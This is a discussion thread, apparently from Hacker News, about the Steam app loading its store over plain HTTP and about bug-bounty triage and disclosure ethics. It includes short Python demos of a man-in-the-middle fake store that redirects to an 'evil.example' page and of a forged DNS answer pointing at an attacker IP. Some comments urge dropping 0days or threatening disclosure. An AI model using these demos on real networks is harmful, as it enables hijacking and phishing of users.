There is a lot of software that assumes that all connections signed with a given CA are trusted. You wouldn't want to use a public CA in that case because random people could access your services. Want to encrypt mongodb traffic? Create your own private CA. Want to encrypt zookeeper (or etcd for kubernetes) traffic? Create your own private CA. Each server and client gets its own certificate signed with that private CA and since only that private CA is marked as trusted it can be used to authenticate servers and clients. It's basically the same idea as if you had a cryptographically signed token such as JWT. (the private key of the CA is the shared secret)
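
A minimal sketch of that private-CA pattern using Python's ssl module. The file names are hypothetical, and the load calls are commented out since they depend on files you'd generate for your own CA:

```python
import ssl

# Server context for a service (e.g. an internal datastore) where the
# private CA doubles as authentication: only certs chaining to our CA
# are trusted, and clients must present one too.
def make_server_context(ca="private-ca.pem", cert="server.pem", key="server.key"):
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.verify_mode = ssl.CERT_REQUIRED   # reject clients without a valid cert
    # ctx.load_cert_chain(cert, key)      # server's own cert, signed by the CA
    # ctx.load_verify_locations(ca)       # trust *only* the private CA
    return ctx
```

With a public CA in `load_verify_locations`, anyone holding any publicly issued cert would pass verification, which is exactly why a private CA is used here.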


Why does the redirected request accept a self-signed cert, but the initial request doesn't? That seems weird.


It depends on how the app is displaying the link. They could be setting all sorts of cookie info/metadata in the original http request. There are many answers as to why it is accepted. I'm obviously not the developer of the valve app so I can't tell you exactly.


What do cookies and metadata have to do with certificate validation?


The http link could theoretically be serving the cert to the device. I'm not sure WHY they would do this, just guessing. However, the redirect makes it seem intentional for whatever reason.


> Companies receive so many [...] reports

If only Valve could hire a subcontractor whose task it was to triage and clarify these reports...


The domain and what they are reading off of that filesystem matter, though. For example, if there was a credential in the clear (or poorly encrypted) that is used in other parts of your system.


I've reported one bug to HackerOne so far, which was a bug with Wordpress that allowed you to access the title of unpublished posts. Months went by with no reply, despite clear demonstrations of how it could be exploited.

Eventually I demonstrated the attack on Techcrunch's site to a Techcrunch reporter, showing him the titles of their upcoming news stories for the coming week, including embargoed news. They got in touch with HackerOne/Wordpress and it finally got resolved a month or two later.

I don't feel like HackerOne added anything positive to the mix, other than a layer of confusion/delay.


HackerOne started with such promise, but stories like this keep coming out. It makes you wonder how many people were even more patient than OP.

Unfortunately, despite all the HackerOne claims, it still seems to take public disclosure and embarrassment to make companies actually take things seriously. Seems sunlight is still the best disinfectant.


One of the big problems is the reports are bad. Like some person just shotgunning the output of an automated script to every company in there without really understanding. Or we get a lot of “I can squat an s3 bucket with the company name in it and make it public” - no way! So filtering through to the good ones takes too many hands, and often times they’re like this one where it’s like...yea technically true but an acceptable enough risk.

But occasionally the “oh f#%^” report comes in...


> HackerOne started with such promise, but stories like this keep coming out. It makes you wonder how many people were even more patient than OP.

To state the probably obvious, remember that primarily what you see are the negative interactions. You're unlikely to see many posts about the positive interactions. People don't tend to post so much when things go as expected, they do when they go wrong.


I think what you're all missing is the asymmetry: most bug reports are bad. If you understand this, then you understand that HackerOne has respected its promises to the companies hiring them: they perform the first round of triage. Given the number of reports they are going through, the number of bad stories we're hearing about them is actually pretty low.

I feel like it's the same with any type of bad news: it can easily blow out of proportion and wrongly indicate that things are going very, very badly. I guess this is why the news is addicted to shocking, breaking news.


Yeah, as far as I understand the entire model of HackerOne is that it's a first-line force for the security team, just like an outsourced support. And the first line tends to be cheap instead of well-trained.


Eeeh, I think that's a false assumption. It may in fact be the case, but specialized first-line teams like this don't need to be cheap; they can instead work the margins and be economical by being focused. Not every company is going to have a full security team, so it does make some sense to try and pool those resources into one specialist company that serves the first-line triage needs of a bunch of other companies.


Yeah, it should be the opposite. HackerOne should have a pool of experts that small companies wouldn't be able to afford and large companies don't have to hire security experts that sit idle most of the time.


And if the claims of HackerOne/Valve trying to get out of paying a bounty are true, that's just terrible, because a lot of these exploits can be sold to nefarious actors for much, much more.

Not paying out the promised bounty, to me, basically spits in the face of independent (and ethical) security researchers.


Trying to put myself in the shoes of the Valve employee: I don't think they were trying to save their company money, but it still wasn't a smart move.

As a security team employee, I think it's easy to react defensively to every vulnerability report, to take them as critiques of the quality of your work. So it's natural for the first reaction to be jumping to "this is not a real report" or "this is a dupe".

But people in this position should think about the upside/downside of their actions.

ACCEPT - Upside: You show that your security team is responsive, you build trust with an active security community member. Downside: Your company pays out some fee (so tiny in big picture)

DENY - Upside: Your company doesn't pay out a fee. Downside: Usually a net negative for your company's reputation in security community, some chance you cause PR issues for your company.


Bounties are only a decent income if you're:

    * In that *very* small slice of hackerdom who can consistently manage a $10k bounty a month
    * Working a pretty favorable currency and CoL conversion
It takes a lot of discipline and well-developed process to handle vulnerabilities well. Many companies don't manage this. Instead, they are often earnestly bad at it.

It's possible Valve is trying to get out of paying the bounty. It's also possible and even likely that they're honestly just bad at handling reports as an organization.

That would make sense. At this point in time the primary reason to have a bug bounty program is so that you can say you have one. Most will maybe get a handful of reports a quarter about low-hanging fruit.


HackerOne is a business operating in a field with a maximal cross-product of drama and customer service overhead. Of course you're going to see story after story about them. What else would you expect?

Here's a story about someone with a decent but low-severity finding, apparently a duplicate of someone else's (unsurprisingly, since it's pretty obvious once you actually look at this app) who had a hard time getting Valve to take that finding seriously. It looks like H1's triage did not-the-greatest job in vetting the submission; also: not unheard-of.

And? I'm not sure there's a punch line here? "Tech worker has unsatisfying customer support experience with first-level security tech support" doesn't make for a zippy headline, but I think it sums up the story.


Is the issue HackerOne, or is it HackerOne doing as Valve (their client) instructed them? It seems Valve were aware of the issue for weeks or months before he reported it and still hadn't added an "s" to "http" after 3 more months. Why is that?


This HackerOne thing seems weird. It's like they looked at Google and decided "let's apply their customer service, but for security researchers." With this model, things like this blog post inevitably follow -- including the "they ignored me until I complained on Twitter, then they instantly fixed it". (Classic.)

I took djb's "Unix security holes" class in 2004 and he advocated for just disclosing the security hole immediately, things like this haven't changed my mind. I know people want the money, but it's peanuts and doesn't seem worth the hassle unless you're really young. Nobody is going to spend months looking for obscure bugs for $10,000 when they could get paid that in a week to write the bugs (accidentally) in the first place.

It all makes very little sense to me. If you care about security, you'll have a team like Project Zero. Anything else is just applying the "gig economy" to engineering work, and the results are pretty predictable. It's kind of sad.


Important life lesson: drop 0days on twitter, you wont get bounties, but at least you will get recognition and job offers.


My guess is that, like the crypto wars, disclosure fights are going to happen every generation.

There was a big discussion about this in the 90s. Vendors would sit on bugs forever, frequently simply to suppress knowledge of them rather than fixing them. Hackers rebelled; some simply published what we now call 0days, others would publish on a non-negotiable timeline. Eventually, "responsible disclosure" became a norm.

Looks like companies have once more figured out how to game the process, so their counter-parties are going to renegotiate. And the cycle of life is complete.


This. F responsible disclosure.


I feel like OP should have made an initial concise statement: "I will publish this in 60 days. Your move."


Apparently Microsoft hired SandboxEscaper, notorious non responsible disclosure 0day dropper, proving my point rather succinctly. https://twitter.com/SandboxBear/status/1210133985478791171

No tedious 3 day whiteboard interviews there I bet.


This is an overall problem at bigger companies. The machinations that decide priorities often do not understand engineering concerns and thus never prioritize the fixes. It's not uncommon to see engineering items that would take 30 minutes to fix get hours of discussion about "should we fix it?" and "when?"

I tend to sneak these little things into my PRs because I can't stand to see them linger w/o cause.


I’d like to add a different take to this. I have contacted Valve support in the past, clearly stated my problem, and got a response that looked like they read half of my question and responded without reading the entire thing. If the same team that responds to their customer support reads this stuff, which seems crazy, they didn’t bother to understand the problem before responding.


I don't get the "this issue is a duplicate so we won't pay" business. If I find a serious issue that's still unpatched and someone tells me "Oops, it's a duplicate, sorry!" I'm still going to ask for payment. If I don't get it, it's a given that I'm going public (assuming it is legal to do so). Why doesn't everyone do that?

I'll go even further and say that price negotiation should happen at every disclosure. If you're not satisfied with the price you're getting, go ahead and make the vulnerability public ASAP (assuming it is legal to do so). It's about time that companies that have invested nothing in security compared to their profits, and their parasitic middlemen like HackerOne, acquired proper incentives. Right now, they are getting away with having the public subsidize their security procedures AT MASSIVELY REDUCED costs. This has to stop.


> If I find a serious issue that's still unpatched and someone tells me "Oops, it's a duplicate, sorry!" I'm still going to ask for payment. If I don't get it, it's a given that I'm going public.

Probably because what you've just described could be viewed as extortion, which is illegal in many places. Also, it doesn't really do you any favors, I think. You'll get a week or less of recognition for finding an exploit, and then the story will come out about how you both sniped someone else's find and possibly caused damage on purpose for your five minutes of fame.

To be clear, it's the initial monetary request and actions because it was denied that makes this entirely mercenary and would not reflect well on you. You were obviously willing to sit on the exploit for a while for some cash, so you no longer have any moral arguments to rely on for your behavior if you release it immediately, and the fact that it's not original just makes it worse. I imagine your reputation for security matters might never recover.

There are ways to get the moral defense back, but it requires waiting a while to see if it actually gets fixed and not taking it public immediately (so it actually is for their unresponsiveness and not just because they didn't pay).


I do not understand why HackerOne has such good reputation. My experiences are almost uniformly bad.


The reputation was earned years ago.


I don't think they have a good reputation.


>This means 1 of 2 things:

>They're trying to get out of paying bug bounty money: I guess this is the more extreme perspective to take here, but considering the whole experience, a definitely possible one. I wasn't here for the bug bounty money, I have work by this point, but if there's some younger child trying to get into security research doing this, this could be enough to massively demotivate them if they were promised it from the HackerOne page.

>They had someone who posted the same bug either weeks or months in advance: This means that Valve left someone else hanging for an insanely long time. This is equally messed up.

I can't understand why, in the age of blockchain-buzzword-bullshitting companies, in one instance where an immutable public ledger would actually be useful (for instance, with a sha512 hash of the initial report), it isn't used. It wouldn't be very complicated, and it would immensely help their trustworthiness.
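
The commitment scheme being suggested is tiny to implement. A sketch, with an illustrative report string; any append-only public log would do for publishing the hash:

```python
import hashlib

# At submission time, publish only the hash of the report. When the
# report is later disclosed, anyone can verify it matches the earlier
# commitment, proving who reported first and when.
report = "The Steam app follows redirects from plain HTTP to any HTTPS URL."
commitment = hashlib.sha512(report.encode()).hexdigest()

# Later, on disclosure, verification is a one-liner:
assert hashlib.sha512(report.encode()).hexdigest() == commitment
```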


I've had or heard quite a few conversations about patent bounties inside of companies that love patents, and there's a very common rule (that ends up being gamed) that each of the first N contributors gets X dollars, and if more than N authors exist then they all split NX dollars.

Unfortunately such a strategy could also be gamed by a bug bounty. If I split 150% of the bounty between all people who reported the bug within a time interval, I could just tell a buddy who has moved out of town about it and end up with a bit more money between the two of us. Either in exchange for him giving me half his bounty, or by returning the favor later.
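
A toy model of that gameable rule, assuming a lone reporter keeps the full bounty while everyone reporting within the window splits 150% of it (the exact numbers are illustrative):

```python
# Everyone who reported within the window splits 150% of the bounty;
# a solo reporter just gets the bounty. This is exactly what makes
# collusion profitable: a pair extracts 1.5x the bounty between them.
def payout_each(bounty: float, reporters: int) -> float:
    if reporters == 1:
        return bounty
    return 1.5 * bounty / reporters

assert payout_each(1000, 1) == 1000     # honest solo report
assert payout_each(1000, 2) == 750.0    # colluding pair: $1500 total
```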


I don't think that splitting is usually necessary. If the company can prove that someone already reported it, and there aren't overly long delays in fixing the vulnerability, I would think people would accept that this time they weren't first, and they'll try again next time knowing that no one is trying to screw them.


I have gone thru similar issues with Valve/Hackerone recently... https://hexpwn.github.io/2020/two-plus-year-old-steam-vulner...


Valve is notorious for ignoring any vulnerability reports


any other sources?


Only anecdotal, I once tried to report a persistent XSS issue on the game "hub" pages. After weeks of going back and forth with support (this was before the likes of hackerone) the ticket was closed and the issue was ignored.


On the other hand, before they started moving to HackerOne, they fixed several issues I reported either the next day or within a week or so. Their security@ was incredibly responsive.

Now it seems it takes forever (I have reports waiting to be paid from them too, even ones they have already fixed.)


Yup. Have dozens of issues reported to security@, and responsiveness was great- usually human response same day, often in hours. H1 is veeeery slow by comparison, but, hey, I've made five figures off it so...




>For a simple MITM exploit that can be fixed by replacing "http://" with "https://", this is simply unacceptable.

I think the author is really not understanding the complexity of updating to an https:// URL inside of a mobile application. Valve is most likely using a self-signed cert, so that would require bundling the certificate in with the app so that Apple/Android allow it to load inside of a WebView. This is not nearly as simple as just updating all of the URLs in the app to https://, and the fix could very well take a few months. Furthermore, loading the store page is not necessarily a vulnerability to Valve, as even if you are able to redirect it, you wouldn't have access to any of the Steam user specifics (like account data). It wouldn't be much different than putting a shady link somewhere on the internet and people navigating to it.


Why would they use a self-signed cert? They could use a real cert. It's Steam. They can afford real certs, or could just use Let's Encrypt.

There is absolutely no reason for the app to connect to a login/authentication service (or any service) over plain text, period! There should be unit tests that scan for http:// and will fail the build if found in the code or resources.

I know some things are not simple fixes, but this is absolutely a fix that can be done and we should all know how to do. It should have also been made a security priority and pushed through.


A self-signed cert is a real cert; it's just not signed by a CA. I guarantee you this http just redirects to an https location (just tested it on my own device), so there is no plaintext transfer. In the mobile industry this happens all the time as backend endpoints grow and change.


The bottom line is, there's no reason to request the non-HTTPS connection in the first place. And there's apparently no checks in the app to make sure it's connected to their real server.


>The bottom line is, there's no reason to request the non-HTTPS connection in the first place.

The example I gave wasn't to excuse the issue, it was to maybe explain why the fix is taking so long.

> And there's apparently no checks in the app to make sure it's connected to their real server.

I don't think you can make that statement. The description of the issue only attempts to hi-jack the session, he didn't actually try to do anything with it. There may very well be checks in place.


What you are saying makes no sense. Why would Android only accept the self-signed certificate when it redirects from http, and not for direct https connections? Can you provide a source, a Stack Overflow link maybe, where this problem is discussed?


Steam is not using self-signed certs. store.steampowered.com is their main user-facing storefront.

Why would they "most likely" be using a self-signed cert? That would be an extreme edge case in my mind, not the standard.


I meant "most likely" as to why they do the http-to-https redirect. I have seen this from several other apps, so I don't think it's extreme, but my guess is just based on the redirect seeming to be intentional. I should probably have said "this could possibly be because" rather than "most likely".


You can't actually do ARP spoofing/hijacking at an ISP level, because ARP/MAC addresses don't have much impact on traffic when crossing a layer 3 (network/router) boundary.


Reading stories like this really make me hate these customer service walls we've put up everywhere. Only a couple of times in these exchanges did it seem like there was a functioning, thinking human intelligence on the other end. All of the robo-responses are depressing, including the human-generated ones. And it's even more discouraging when you have to hear about their company's internal chaos and disorganization. Really gives me a low opinion of this HackerOne organization.


Just drop a line on twitter saying you've discovered a vulnerability in $popularSoftware and mention $company. Say you'll be disclosing in 90 days if $company doesn't issue a reply publicly.

Make sure to deal with an actual human and that everything is done according to best practice. You may even get publicity this way and even if it's unethical it can be sold or used to your advantage.

If they care, trust me when I say they will make an effort. Most places (like Google) have effective systems in place for dealing with such queries.


> even if it's unethical

it wouldn't even be unethical. responsible disclosure starts with engaging with company at eye-level. all that these bug bounty platforms do is take away exactly this power and allow the company to consolidate the contract to a single entity (e.g. preferred supplier). they deserve even less respect than any shady recruiter or typical outsourcing sweat-shop.

giving these people power is like talking to a cop without a lawyer - regardless of what they say, they don't have your interest in mind and you have lost before the game has even started.


> Say you'll be disclosing in 90 days if $company doesn't issue a reply publicly.

That's blackmail. An expedient way of getting your door breached.


The idea that you would get a no-knock forcible entry for disclosing a bug is appalling, and potentially an indictment of our entire criminal justice system.

I'm assuming vntok's legal conclusion and claim of the type of law enforcement response is true (please do not make things up on hackernews).

In which case my former support for the police and law and order is SERIOUSLY diminished.

You have a non-violent offense, one that is not even an actual offense, and they are doing SWAT door breaches on you. Wow! The priorities of these companies and law enforcement are backwards, then.

I guess folks are being told to just sell it to a zero day vendor (which also happens to work for the same govt agency that will bust down your door if you disclose publicly). Pretty appalling behavior here!


"Hey, @WhiteHouse, while interacting with your systems with the intent to find security flaws and obtain unauthorized access (I wrote scanners and tools and payloads so you know I really wanted to succeed here), I've found a security flaw that allows me to launch nuclear warheads from my garage in Misouri. I will publish this info online if you don't meet my demands. You have less than a month to comply."

Yeah, that kind of bullshit won't fly in any sane criminal justice system. Now replace "launch nukes" with "download every movie you're working on" or "flash-crash the stock market at any time", and you'll see that the argument doesn't change: it doesn't fly anywhere.


No, the disclosure is disconnected from payment, so it's not blackmail. Notifying companies is a courtesy, and considered good form. Companies offering rewards is to incentivize this behavior. Researchers releasing vulnerabilities after a time period no matter what is to incentivize companies to actually fix the problems (not just pay to shut up the researcher). Both are useful for a well functioning system of independent researchers finding vulnerabilities in companies that then get fixed.

Releasing the vulnerability because you weren't paid, regardless of whatever timelines you would have followed? That's blackmail. I imagine having a very clear and consistent policy as a researcher that is not based on money (but can be based on company participation and whether they seem like they are actually trying to fix the problem) will go a long way towards clearing you of any suspicion of blackmail.


That is false. In many jurisdictions, blackmail does not require a financial transaction, merely obtaining something deemed valuable by the blackmailer in exchange for keeping the blackmailee's information private. See [1] for the US:

Whoever, under a threat of informing, or as a consideration for not informing, against any violation of any law of the United States, demands or receives any money or other valuable thing, shall be fined under this title or imprisoned not more than one year, or both.

In cases like this one, "bragging rights" are easy to prove as deemed valuable by the blackmailer: they can bring anything from job prospects to donations from activists to free beers at Blackhat.

[1] https://www.law.cornell.edu/uscode/text/18/873


> merely obtaining something deemed valuable by the blackmailer in exchange for keeping the blackmailee's information private.

Exactly. That's why if you have a policy about when the information goes public which is entirely independent of any benefits provided by the company in question, it's not blackmail.

You're not saying "unless you give me X benefit I do Y", you're saying "I'm doing Y at Z date, but I may extend that if you show you're working on the problem." which isn't a benefit to you specifically, but to those affected. As long as you make sure any benefit to yourself is removed from that decision, I imagine blackmail would be very hard to prove.

Bragging rights aren't really the company's to give, since you have the information and will be making it public, unless someone else beat you to it. In that case, going live early unless the company says you found it does impart a real benefit to you that you extracted from the company. That's not what I viewed this thread as about though. Saying you'll release the vulnerability you were already going to release (if you had a clear policy applied consistently) is not so much a threat as giving the company an appropriate chance to respond.

I agree in the case of private companies with little or no public component it does get less clear cut. I'm not sure what those would be though.


In the US, blackmail requires a benefit in exchange for not disclosing information.

A public reply isn't much of a benefit, and my understanding is that the vulnerabilities will be disclosed eventually within a reasonably limited timeframe.


Google Project Zero is doing exactly that -- disclosing vulnerabilities in 90 days whether or not they're fixed.

This kind of pressure is helpful, because otherwise stories like the OP's will be dominant and security problems will stay unpatched.


but do they trumpet on twitter that they have an exploit and will release it in 90 days?

that's the difference


They have a public issue tracker (issues are withheld from public for 90 days): https://bugs.chromium.org/p/project-zero/issues/list

and a blog: https://googleprojectzero.blogspot.com/

and a Github org: https://github.com/googleprojectzero

and their members do tweet about their findings on their personal accounts.

But no, they don't have an official Twitter account.


A lovely example of why one shouldn't take legal advice from message boards.

But I would say that if you're doing this sort of thing for the first time, I would strongly advise you to talk to a lawyer who knows this corner of the law, and to someone who has done this before.

Smarts do not substitute for experience and domain-specific knowledge.


That's similar to how Project Zero (by Google) works. Exploits get released after 90 days unless the developers can provide a plausible justification for why that deadline can't be met.


In a way, this is the same problem that we see with tech hiring & recruiting. Most gatekeepers are less technical than the most technical developers they gate-keep, but still necessary because 80-90% of reports (in the case of security) / applicants (in the case of hiring) are unqualified. Anyone who is qualified enough to screen without false positives can probably get a better job.


Responsible Disclosure does not mean waiting for arbitrary and unilateral decisions from a company just to be undervalued.

If your argument for responsible disclosure applies equally to this post, to a $100 payout, and to a $100,000 payout - as long as it's from the company that needs to patch the exploit - then re-evaluate your argument.


Has there ever been good news about HackerOne?


I know barely anything about encryption, but this reads to me like the parties involved don't understand that public key cryptography defeats MITM attacks (at least as I understand it)?


The vulnerability is that there was no public key encryption, hence allowing a MiTM to redirect the steam app to their own site.
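As a rough illustration of what the parent means: the "public key cryptography" that defeats a MITM is the certificate check TLS performs by default, and plain HTTP skips it entirely. A minimal Python sketch of the defaults involved:

```python
import ssl

# The check a MITM cannot pass: a default-configured TLS context requires the
# server to present a certificate, chained to a trusted CA, for the exact
# hostname being contacted. An on-path attacker has no such certificate.
ctx = ssl.create_default_context()
assert ctx.check_hostname is True            # hostname must match the cert
assert ctx.verify_mode == ssl.CERT_REQUIRED  # a valid cert chain is mandatory

# A plain http:// request performs none of these checks, so anyone between
# the client and the server can impersonate the server byte-for-byte.
```

That's why "the app used http:// instead of https://" is the whole vulnerability: the cryptography exists, the client just never invoked it.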


Wait steam client does not even use https??


If I read it correctly, the mobile app first connects to the store page over http, which then gets redirected to the https version by their server. So it's probably a typo / misconfiguration in the app. The store itself uses https everywhere. If you intercept the first request, though, you can display whatever you want to the user.
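To make the interception concrete, here's a minimal sketch (hypothetical hostnames; it assumes the attacker already controls DNS or the gateway, so the app's plain-HTTP request reaches them): a tiny server that answers the unauthenticated first request with its own redirect, before the real server's HTTPS redirect is ever seen.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

ATTACKER_PAGE = "https://evil.example/fake-steam-store"  # hypothetical URL

class FakeStore(BaseHTTPRequestHandler):
    """Impersonates store.steampowered.com for clients connecting over
    plain HTTP. Nothing authenticates us, so we can redirect anywhere."""
    def do_GET(self):
        self.send_response(302)
        self.send_header("Location", ATTACKER_PAGE)
        self.end_headers()
    def log_message(self, *args):  # keep the demo quiet
        pass

# Demo: run the fake store on an ephemeral local port and issue the kind of
# request the app would send before any HTTPS redirect can protect it.
server = HTTPServer(("127.0.0.1", 0), FakeStore)
threading.Thread(target=server.serve_forever, daemon=True).start()

conn = http.client.HTTPConnection("127.0.0.1", server.server_port)
conn.request("GET", "/", headers={"Host": "store.steampowered.com"})
resp = conn.getresponse()
print(resp.status, resp.getheader("Location"))  # 302 to the attacker's URL
server.shutdown()
```

Had the app requested https:// from the start, this server would fail the TLS handshake instead of being obeyed.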


How is this a vulnerability?


The vulnerability, on the high level, is that the Steam app doesn't verify that the store page comes from Valve, meaning that if you own a Wi-Fi hotspot you can potentially scam and cheat the users of the Steam app. This wouldn't have been possible with basic use of SSL by the app.

That's what makes this bizarre – the negligence of developers, the triviality of the fix and the complete lack of understanding from people who are supposed to be reviewing security issues.


The report could have been better worded, IMO; it hardly explains the trivial issue or the trivial fix, preferring to go on at length about what happens if the ISP is hacked and other far-fetched scenarios.

It wouldn't hurt to say that they simply have a typo in the URL. http instead of https.
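A sketch of what that one-character class of fix amounts to (hypothetical helper, not Valve's actual code): pin the scheme to https so TLS can authenticate the server before anything is rendered.

```python
from urllib.parse import urlsplit

STORE_URL_BROKEN = "http://store.steampowered.com/"   # anyone on-path can answer
STORE_URL_FIXED = "https://store.steampowered.com/"   # TLS verifies the server

def is_safe_store_url(url: str) -> bool:
    """Accept only HTTPS URLs pointing at the expected store host."""
    parts = urlsplit(url)
    return parts.scheme == "https" and parts.hostname == "store.steampowered.com"

print(is_safe_store_url(STORE_URL_BROKEN))  # False
print(is_safe_store_url(STORE_URL_FIXED))   # True
```

The same check applied to redirect targets would also stop an attacker from bouncing the app to a look-alike host.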


How is this not? Steam clients are basically glorified web views for the shop portion, and users regularly enter credit card details in them to buy games or hardware. Users also might have virtual currency or valuable stuff in their account worth a lot of real money, and users trust everything that's inside these clients.

So by MITMing any unencrypted connection to a Steam server, an attacker can steal either credentials or payment info.


The software is vulnerable to a MITM attack. There's no reason it should be.


Frankly, I'm surprised the site didn't respond with a 302 redirect to SSL to avoid this kind of thing entirely (versus relying on client to specify the correct protocol).


The client _must_ use the correct protocol, that's precisely the issue.

An insecure request to switch to a secure protocol would just be elided by an attacker. If the client is coded to expect such a switch and fail if it doesn't happen, that client is at best implementing a more complicated, ad-hoc secure protocol.
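That "more complicated, ad-hoc secure protocol" has a standardized form: HTTP Strict Transport Security (HSTS). A sketch of the headers a server might send (hypothetical helper); note that even with HSTS the very first plain-HTTP request from a fresh client is still interceptable, which is why the client hard-coding https matters.

```python
def plain_http_response_headers(host: str, path: str) -> dict:
    """Headers a server might send for a plain-HTTP request: redirect to
    HTTPS and set HSTS so the client refuses plain HTTP from then on."""
    return {
        "Status": "301",
        "Location": f"https://{host}{path}",
        # Clients honoring this will upgrade to HTTPS for the next year
        # without ever issuing another strippable plain-HTTP request.
        "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    }

print(plain_http_response_headers("store.steampowered.com", "/")["Location"])
```

An attacker who catches that first request simply never forwards the redirect or the HSTS header, so the server-side fix alone doesn't close the hole.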


I don't follow. That's quite obviously not a proper fix.


How is that a vulnerability? If the ISP DNS gets hacked, people can intercept traffic. Seriously, this is the best attack scenario he could come up with?

From what I understand, it seems the Steam app is connecting to plain HTTP (http://store.steampowered.com/), so it could be man-in-the-middled.

Unless I am missing something, it's way overblown. Valve, please fix the URL to https and send that guy a $50 Amazon voucher.


at this point they should send him $250 for having to deal with their atrocious bureaucracy


> If the ISP DNS gets hacked people can intercept traffic.

Usually machines will follow the DNS server they get from DHCP. You don't have to hack an ISP DNS, just have control over the router the user is connected to.
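As a sketch of why controlling the router is enough (hypothetical values; a rogue router that hands itself out as the DNS server via DHCP can answer every lookup): forging an A record for whatever name the victim asks about takes only a few lines. This assumes a simple single-question query with no extra records.

```python
import struct

EVIL_IP = "203.0.113.7"  # hypothetical attacker address (TEST-NET-3 range)

def forge_dns_answer(query: bytes, ip: str) -> bytes:
    """Given a raw DNS query, forge a response claiming `ip` owns the name.
    A rogue DNS server could answer every lookup this way, pointing
    store.steampowered.com at an attacker-controlled host."""
    txid = query[:2]                            # echo the client's transaction ID
    flags = struct.pack(">H", 0x8180)           # standard response, no error
    counts = struct.pack(">HHHH", 1, 1, 0, 0)   # 1 question, 1 answer
    question = query[12:]                       # copy the question verbatim
    answer = (
        b"\xc0\x0c"                             # name: pointer back to the question
        + struct.pack(">HHIH", 1, 1, 60, 4)     # type A, class IN, TTL 60s, 4 bytes
        + bytes(int(octet) for octet in ip.split("."))
    )
    return txid + flags + counts + question + answer
```

Against a plain-HTTP client this forged answer is game over; against an HTTPS client it only causes a failed certificate check, which is the whole point of the fix.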



